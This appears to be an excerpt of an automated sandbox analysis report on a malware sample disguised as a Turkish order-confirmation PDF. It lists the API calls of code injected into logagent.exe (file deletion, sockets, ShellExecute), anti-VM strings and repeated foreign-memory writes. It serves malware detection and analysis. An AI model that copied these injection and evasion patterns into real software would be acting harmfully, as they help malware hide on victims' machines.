                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00404C0A
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_0040751B
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr3_2_00410586
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_0040728F
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE3_2_0040477E
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00403325
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_00412BEE
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10548C1E getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose,3_2_10548C1E
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10544CB4 FindFirstFileW,3_2_10544CB4
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1055457D FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose,3_2_1055457D
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1054610D _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread,3_2_1054610D
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10546599 FindFirstFileW,FindNextFileW,FindClose,3_2_10546599
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10548EAA getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose,3_2_10548EAA
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10551F15 FindFirstFileW,3_2_10551F15
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha3_2_00403C4A
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310315497.00000000007A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310315497.00000000007A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpp.com
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8{%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_00409908
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_105410AC mov eax, dword ptr fs:[00000030h]3_2_105410AC
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_105410AC mov eax, dword ptr fs:[00000030h]3_2_105410AC

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 940000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 9D0000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 9E0000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 9F0000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: C00000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: C10000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 950000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 960000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 970000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10540000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 980000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 990000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 5F0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 880000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: C50000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 800000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 810000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 820000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 830000Jump to behavior
